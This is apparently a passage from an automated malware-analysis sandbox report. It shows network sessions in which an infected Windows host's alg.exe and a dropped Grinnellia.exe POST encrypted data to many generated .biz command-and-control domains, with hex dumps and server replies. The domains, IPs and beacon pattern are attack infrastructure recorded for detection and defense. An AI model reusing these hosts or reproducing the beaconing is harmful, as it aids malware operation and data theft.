                                                                                                                                                                                                    Data Ascii: EvIDgP<yE0_v\jA>wqcFtZn[}"h^E^vM2jzAbhR]mPy^n<z%@Hy+yg 4=&ofraIh^-6nil(n<n!jY\MFd


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    8192.168.2.549714172.234.222.143801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.710709095 CET355OUTPOST /tohnhxnrpjse HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.711075068 CET778OUTData Raw: bb ed 95 55 9c 24 a1 58 fe 02 00 00 5f ab a5 41 b7 d0 f7 2f cb 21 2f 01 f7 cb 5e cd aa 79 76 cb db d5 bf 64 19 56 0b 73 04 3e 50 b6 78 8c 5d c9 e4 f0 87 d7 59 da 3a eb e9 df 92 07 3e f1 95 00 6a 1d 52 3a c8 12 a7 04 72 b1 d2 85 a1 12 b0 c5 1c 37
                                                                                                                                                                                                    Data Ascii: U$X_A/!/^yvdVs>Px]Y:>jR:r73stl:0L`M/KTU<C3bujT2jfU@\7'^Ou~I@%7/kPhP`sGZ2bJq


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    9192.168.2.54971554.244.188.177806804C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.779052019 CET356OUTPOST /ksmybghbmbq HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 830
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.779221058 CET830OUTData Raw: 19 4d 8a b1 56 0e 21 a2 32 03 00 00 62 3f 61 f1 3b bd df 33 e4 cf 66 b0 5d a1 96 fe 8e 43 02 8b 4a 64 77 00 91 b1 a1 e2 4a c9 43 48 f6 6f c2 70 6e 56 4a d1 7f 51 36 78 77 5f a7 2c 65 a4 bc e2 b0 ed ab 1b 38 7c 12 4b 07 d0 32 e1 41 55 7a 09 0a 3c
                                                                                                                                                                                                    Data Ascii: MV!2b?a;3f]CJdwJCHopnVJQ6xw_,e8|K2AUz<0xK~|bwRkKH.]1b+z8m5{DnX\dOh0V NBGW%kP.J!JQ9(#R kFUceG&J.>:a4Y
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.183105946 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:16 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=b3d361950abebec3f33ff315c9d9c6fc|8.46.123.75|1732298116|1732298116|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    10192.168.2.54971718.141.10.107801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:16.047712088 CET357OUTPOST /ywaoqfakpesqv HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: knjghuig.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:16.047730923 CET778OUTData Raw: 54 16 04 0b 2d 11 b6 44 fe 02 00 00 b1 68 81 6a d1 79 11 b1 28 9b 5b 19 5e 5d b9 de c7 09 ae b0 08 6f 8d 0d c4 72 c4 ac 17 39 34 94 d0 90 f6 fd 9f 01 18 e9 df 7b 1a d2 73 78 2e 8b 7e f0 d2 29 01 3c 8e 49 67 81 dd 5f c9 24 e8 b0 ab 85 e0 46 2f fd
                                                                                                                                                                                                    Data Ascii: T-Dhjy([^]or94{sx.~)<Ig_$F/AF3hT;SgX/u@E%s%@q+#H+Yr-mz>Xn@zk2*q8<kNV?$*wmYhDFi|1"c0
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.095194101 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:17 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=f6a3e2cfa3867a0366633fecddea8136|8.46.123.75|1732298117|1732298117|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    11192.168.2.54971918.141.10.107806804C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.842711926 CET356OUTPOST /uqppkasccjtxk HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 830
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.842730999 CET830OUTData Raw: 7b cc b1 a9 3a cc 33 d9 32 03 00 00 61 bc 8c 88 35 61 2a a9 9b 59 b9 40 31 6b 17 1e f0 02 7e b9 3f 3a 37 1e 47 47 69 2d 6f 78 44 f5 53 9d d9 d2 d5 a1 0c 36 3e cf de b8 81 03 9a 19 89 ef 07 60 ec d6 07 11 25 1b 72 5f 34 0d c0 44 45 a9 b6 ca 19 49
                                                                                                                                                                                                    Data Ascii: {:32a5a*Y@1k~?:7GGi-oxDS6>`%r_4DEIO}7m[I5'F@FG:S6![R.Hw1Y_E4PTXJ9~B50"Se~YIB"j=itE*G]?`
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.949023962 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:19 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=8f56a2fc05878f1364786778275e8ab1|8.46.123.75|1732298119|1732298119|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    12192.168.2.54972782.112.184.197801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.453571081 CET354OUTPOST /svftqsgvqnih HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.453596115 CET778OUTData Raw: d3 a3 85 1a 1c 80 0a 79 fe 02 00 00 1e 13 b0 85 85 55 0c cd 46 d7 45 95 4e 98 04 3c 92 6b fc ca 94 b9 3e 1e 08 dc 18 fa 6d 52 33 5a 6e cc 14 be 98 91 ff 8b 7c 6a 60 9c 18 6c 27 19 9a 0e 0d d3 aa cf 16 f6 d5 f9 ba fa 16 78 43 c1 6d a2 b8 eb d8 12
                                                                                                                                                                                                    Data Ascii: yUFEN<k>mR3Zn|j`l'xCmJh-9G(["qt;O~E7jq.\;u(=)T~@DqRawAQ))mO3wJ6Tas >U?XH8!- Zy-7Lx_!f


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    13192.168.2.54978282.112.184.197801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.969852924 CET355OUTPOST /ecjuuqdshncew HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.970025063 CET778OUTData Raw: d6 ff f4 35 c4 0d 7f b2 fe 02 00 00 f3 0f ed 19 3e ec c0 bc 58 42 4e 55 c8 fe 05 b7 c5 db 36 37 2e 2c 9d ef 70 a4 cc 95 3a d9 13 de 69 e5 17 36 ad 77 9e f9 99 fb 84 8e dc e7 bb 8b 52 fc 98 b6 a7 2c 16 41 ed 43 db 0b 74 5e 9a 26 3e 56 d0 c7 4f fb
                                                                                                                                                                                                    Data Ascii: 5>XBNU67.,p:i6wR,ACt^&>VOd)pK\+O.tl08W,w<}tSZKR*>#S@pP:3bp#iPMF"i'Sfm5<hp(b=LHCo


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    14192.168.2.54983382.112.184.197801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.142081022 CET352OUTPOST /fgjkxxt HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.142081022 CET778OUTData Raw: 9a ad 0e 4a ed b2 47 0d fe 02 00 00 f5 e6 1e 67 f9 00 42 c0 2d ef 90 a0 13 24 c9 1b 75 f8 7a 0d cf 71 7a 86 a7 83 3b 67 94 9c 71 df 53 8a 26 04 9c 12 77 ad 49 50 d0 f1 1e d1 a9 19 04 3c b1 a4 51 f1 24 0a 88 77 51 e9 74 9a 5e 06 ce bc 5a 21 68 19
                                                                                                                                                                                                    Data Ascii: JGgB-$uzqz;gqS&wIP<Q$wQt^Z!hj)d3U,P]lhv:q0U;J@5*//90s2XqJ5e<j|*liu~9dk-m=y}^n#AsG 9/@{p;;4]`


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    15192.168.2.54988482.112.184.197801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.311450958 CET361OUTPOST /dpxeblwuppuirbnx HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.311466932 CET778OUTData Raw: 9f 3a 83 cf 24 65 16 15 fe 02 00 00 1d 8f 96 15 d1 5b 77 93 f5 d7 46 2e 67 b2 84 d9 db 2f fe b5 da ef 67 d6 5c 7e b4 87 56 13 6c fd 55 bb 2a fc 27 09 b8 92 5d 27 3a 34 25 a7 00 5e fe c1 5a db 89 d9 be 71 5a 0b 36 23 10 db 3d df a7 d1 cf e8 8b 77
                                                                                                                                                                                                    Data Ascii: :$e[wF.g/g\~VlU*']':4%^ZqZ6#=w[^ctW/jBrJ V4Ot49genb/{Q=Rcqm"RM{(kP q$HLE"P3]oe@J8` Mp&QIqN


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    16192.168.2.54993547.129.31.212801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.008776903 CET357OUTPOST /wjxiioeyplqiis HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: xlfhhhm.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.008891106 CET778OUTData Raw: cd 5a 61 b2 40 08 86 f7 fe 02 00 00 97 c3 07 50 5a bf 68 a9 f3 25 23 40 4f d5 3e 4c e5 da 2b bf 93 25 11 25 50 ea 82 e3 e9 3d ee cf 12 c0 d0 ee 19 48 62 94 d8 09 d0 b1 8f 94 85 38 0a 7f 21 ed 21 6f f2 9c 9a e0 44 da 41 97 71 7b 29 0e 2c aa 31 da
                                                                                                                                                                                                    Data Ascii: Za@PZh%#@O>L+%%P=Hb8!!oDAq{),1:kr`$x1m`^=Q1&gQtu0Rdv{Ko'2{:9E5]+GBWRW:PL\!<KtP'M n~
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.059329033 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:56:52 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=ab96459bb8a968ab765ee34cf5ba6022|8.46.123.75|1732298212|1732298212|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    17192.168.2.54994213.251.16.150801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.815355062 CET350OUTPOST /jlhpxxcq HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: ifsaia.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.815382957 CET778OUTData Raw: fb 45 49 06 22 c6 24 99 fe 02 00 00 5a 1b 60 dd 58 27 a2 70 34 15 99 24 e3 b7 5c fd 32 6c a6 e5 c1 ad 9f 4f 21 aa 8a 5d 65 62 49 dc d0 de 52 7f 46 42 ca c8 23 b5 62 20 0d 7f 2d ad b4 bb c5 ec 93 db be 31 97 28 f4 de 1d 44 08 e9 14 ee f8 cb a5 43
                                                                                                                                                                                                    Data Ascii: EI"$Z`X'p4$\2lO!]ebIRFB#b -1(DCmq M'[a~bF YU_08n,v&=(0HOE=s-ClR7t=}_XL"_[~ZgppX"C*O;W.
                                                                                                                                                                                                    Nov 22, 2024 18:56:55.906182051 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:56:55 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=16ac55c069fc04df4ea57eeed3641c0e|8.46.123.75|1732298215|1732298215|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    18192.168.2.54994944.221.84.105801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.598767996 CET359OUTPOST /xyvnmtdiyfgocm HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: saytjshyf.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.598787069 CET778OUTData Raw: bd a6 63 71 66 56 8b 93 fe 02 00 00 01 7b d7 c5 63 28 93 dd 36 90 9e b4 9e bc 02 26 f0 0c 60 a9 63 dc 13 f8 49 9b 81 25 f7 52 75 5d ea 4a ca b0 57 6c 45 3c a7 b7 0a 67 dd 66 fa a4 72 cc dc b1 ca e7 10 8a 85 a1 2e 07 63 9f 2c 6b ee c0 2a 5e 2a 8b
                                                                                                                                                                                                    Data Ascii: cqfV{c(6&`cI%Ru]JWlE<gfr.c,k*^*ca<[a/s R1>>2s)!8pjQfr/?xO5\ZMoy{8W3P\afC`ga7E8&n&UybJV&*0
                                                                                                                                                                                                    Nov 22, 2024 18:56:57.871642113 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:56:57 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=c1a837d8bb5329d844804df8fd673c47|8.46.123.75|1732298217|1732298217|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    19192.168.2.54995518.141.10.107801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.747802973 CET353OUTPOST /lyroetjkhx HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: vcddkls.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.747802973 CET778OUTData Raw: 89 c9 92 88 e5 7e 58 c9 fe 02 00 00 f7 ca 6a f7 9e dd 7e 7e f6 af cd d2 3c 70 8a 49 5f 2d 2a d1 b9 48 bd cb 53 8c a8 6e 15 f8 02 cc e7 95 58 e7 0c 22 a6 79 f8 f5 77 c4 e3 4a 36 c4 2f c9 f1 64 d2 5f 85 85 79 6c 82 09 f8 6a 7e 31 98 ec 40 7c 52 08
                                                                                                                                                                                                    Data Ascii: ~Xj~~<pI_-*HSnX"ywJ6/d_ylj~1@|RDMR&Q%_]*G)`CAk8 YU+o;}i~8x+qLdCb<nCjqJdrTM)y7M @v9p$44kug>(UBq)Jq1:L?!tQ
                                                                                                                                                                                                    Nov 22, 2024 18:57:00.855160952 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:57:00 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=7d45a6e335c42a3fa6303a76ddf991c1|8.46.123.75|1732298220|1732298220|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    20192.168.2.549963172.234.222.143801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.500308037 CET355OUTPOST /dydgtoryupjgtl HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: fwiwk.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.500308037 CET778OUTData Raw: 1d 5d b9 fd 16 4f 89 d9 fe 02 00 00 15 c3 84 ae 7d 1d ee de 3f eb 39 86 2d 92 75 1f bf cf dd c9 c7 06 91 be 9f a7 d1 ca e3 a9 bd 43 26 d9 13 d7 62 88 af 88 d0 b4 ef 7a 11 b2 3a 64 da e1 2b e2 aa 8a 8a 3d f9 f2 b2 00 0c 3f 84 06 35 a0 54 89 d9 2a
                                                                                                                                                                                                    Data Ascii: ]O}?9-uC&bz:d+=?5T*y&Q/j~+_i_p<n~;jw5*x.\9G2Dnc@pbw-M~qI]z.J`RGdQ*KOFh-m]WonR{|'Oz:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    21192.168.2.549965172.234.222.143801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.802057028 CET347OUTPOST /mhwavs HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: fwiwk.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.802097082 CET778OUTData Raw: a5 2b 17 84 9e 61 51 85 fe 02 00 00 06 c7 81 9f 6b e8 62 74 d9 28 e4 1a ed c7 61 f4 b5 f8 fc 70 21 ff fd 6b 6e 73 70 39 a4 f6 b0 76 e1 4d 50 49 a7 a3 af 11 8d d0 a8 c6 4a 5b ce ec 8e 18 3a 7f 47 9b 44 45 7d e0 ce 2d f2 01 c9 26 f1 01 c5 c9 b7 d8
                                                                                                                                                                                                    Data Ascii: +aQkbt(ap!knsp9vMPIJ[:GDE}-&@H~WQ[L3`h`'aCy4m >N{- a&oagw6!N. wE3QD+nC=od+vo%+kk+0kEy~{UNSy>0aT(D0q!.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    22192.168.2.54997134.246.200.160801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.871220112 CET344OUTPOST /ho HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: tbjrpv.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
